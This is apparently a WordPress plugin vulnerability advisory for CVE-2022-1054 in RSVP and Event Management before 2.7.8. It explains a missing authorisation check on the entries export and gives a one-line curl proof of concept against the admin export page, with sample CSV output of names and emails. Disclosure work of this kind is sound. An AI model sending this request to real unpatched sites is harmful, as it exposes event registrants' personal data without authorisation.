RSVP and Event Management < 2.7.8 – Unauthenticated Entries Export | CVE 2022-1054 | Plugin Vulnerabilities

Description

The plugin does not have any authorisation checks when exporting its entries, and has the export function hooked to the init action. As a result, unauthenticated attackers could call it and retrieve PII such as first name, last name and email address of users registered for events

Proof of Concept

curl "https://example.com/wp-admin/admin.php?page=rsvp-admin-export"

"First Name","Last Name","Email","RSVP Status","Kids Meal","Associated Attendees","Vegetarian","Note","Additional Attendee","pre-fill URL"
"test","test","secret@example.com","Yes","N","","N","","N",""

Affects Plugins

Fixed in 2.7.8

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://daniel-ruf.de

Verified

Yes

WPVDB ID

95a5fad1-e823-4571-8640-19bf5436578d

Timeline

Publicly Published

2022-03-28 (about 3 years ago)

Added

2022-03-28 (about 3 years ago)

Last Updated

2022-04-11 (about 3 years ago)

Other

Published

Title

Published

2024-01-10

Title

EventON (Free < 2.2.8, Premium < 4.5.5) - Unauthenticated Virtual Event Password Disclosure

Published

2024-06-05

Title

WP Dark Mode – WordPress Dark Mode Plugin for Improved Accessibility, Dark Theme, Night Mode, and Social Sharing < 5.0.5 - Missing Authorization

Published

2025-09-08

Title

Categorify <= 1.0.7.5 - Missing Authorization

Published

2024-12-19

Title

Member Directory and Contact Form < 1.8.0 - Missing Authorization

Published

2022-11-28

Title

Directorist < 7.4.4 - Subscriber+ Sensitive Information Disclosure